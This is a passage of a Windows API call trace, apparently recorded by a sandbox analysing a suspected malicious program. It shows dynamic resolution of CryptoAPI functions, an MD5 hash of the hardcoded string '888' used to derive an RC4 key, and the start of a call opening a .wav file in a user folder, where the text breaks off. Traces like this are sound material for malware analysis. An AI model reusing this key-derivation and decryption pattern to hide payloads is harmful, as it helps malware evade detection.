lpsz="SSA4E00B02826", cchLength=0xd | out: lpsz="SSA4E00B02826") returned 0xd [0205.790] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b48 | out: hHeap=0x2af0000) returned 1 [0205.790] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71718 | out: hHeap=0x2af0000) returned 1 [0205.790] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa50 | out: hHeap=0x2af0000) returned 1 [0205.790] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8b8 | out: hHeap=0x2af0000) returned 1 [0205.790] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa68 | out: hHeap=0x2af0000) returned 1 [0205.790] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71688 | out: hHeap=0x2af0000) returned 1 [0205.790] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a716e8 | out: hHeap=0x2af0000) returned 1 [0205.790] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0205.790] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e640 | out: hHeap=0x2af0000) returned 1 [0205.791] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0205.791] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71688 | out: hHeap=0x2af0000) returned 1 [0205.791] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa68 | out: hHeap=0x2af0000) returned 1 [0205.791] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa50 | out: hHeap=0x2af0000) returned 1 [0205.791] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa990 | out: hHeap=0x2af0000) returned 1 [0205.791] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0205.791] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0205.791] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0205.791] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0205.791] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0205.791] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0205.791] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0205.791] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0205.791] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0205.791] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0205.791] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0205.791] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0205.791] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0205.791] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0205.791] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x29f6fc0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0205.792] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0205.792] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x29f7060, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0205.792] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa7c660) returned 1 [0205.792] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0205.792] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0205.793] CharUpperBuffW (in: lpsz="A0600D00A16", cchLength=0xb | out: lpsz="A0600D00A16") returned 0xb [0205.793] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0205.793] CharUpperBuffW (in: lpsz="SSA0600D00A16", cchLength=0xd | out: lpsz="SSA0600D00A16") returned 0xd [0205.793] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0205.793] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0205.793] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0205.793] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0205.793] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0205.793] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0205.793] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0205.793] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0205.793] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0205.793] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0205.793] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0205.793] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0205.793] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0205.793] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0205.793] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0205.793] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0205.793] CharUpperBuffW (in: lpsz="A2E00304E40", cchLength=0xb | out: lpsz="A2E00304E40") returned 0xb [0205.793] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0205.793] CharUpperBuffW (in: lpsz="SSA2E00304E40", cchLength=0xd | out: lpsz="SSA2E00304E40") returned 0xd [0205.793] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0205.794] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0205.794] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0205.794] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0205.794] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0205.794] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0205.794] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0205.794] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0205.794] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0205.794] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0205.794] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0205.794] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0205.794] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0205.794] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0205.794] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0205.794] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0205.794] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0205.794] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0205.794] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0205.794] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0205.794] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0205.794] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0205.794] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0205.794] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0205.795] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0205.795] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0205.795] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0205.795] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0205.795] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0205.795] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0205.795] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0205.795] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0205.795] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0205.795] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0205.795] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0205.795] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0205.795] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0205.795] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0205.795] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0205.795] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0205.795] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2aaadc8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0205.795] CryptCreateHash (in: hProv=0xa7c660, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0205.795] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0205.795] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0205.795] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0205.795] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0205.795] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0205.796] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a719f8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0205.796] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0205.796] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0205.796] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0205.796] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71a28, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0205.796] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0205.796] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0205.796] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0205.838] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0205.838] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0205.838] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0205.838] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0205.838] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0205.838] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2aaabd0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0205.838] CryptHashData (hHash=0x9e21f8, pbData=0x2a71b88, dwDataLen=0x3, dwFlags=0x1) returned 1 [0205.838] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0205.838] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0205.838] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0205.838] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0205.838] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0205.838] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0205.838] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0205.838] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0205.838] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0205.838] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0205.838] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0205.838] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0205.838] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0205.839] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0205.839] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0205.839] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2aaaf48, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0205.839] CryptDeriveKey (in: hProv=0xa7c660, Algid=0x6601, hBaseData=0x9e21f8, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0x9e1eb8) returned 1 [0205.839] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0205.839] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0205.839] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0205.839] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0205.839] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0205.839] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0205.839] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0205.839] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0205.839] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0205.839] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0205.839] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0205.839] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0205.839] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0205.839] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x29f7180, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0205.839] CryptDestroyHash (hHash=0x9e21f8) returned 1 [0205.839] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0205.839] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0205.839] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0205.840] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0205.840] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0205.840] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\E6IDgLQGE97MYwh0a.wav" (normalized: "c:\\users\\fd1hvy\\music\\e6idglqge97mywh0a.wav"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, 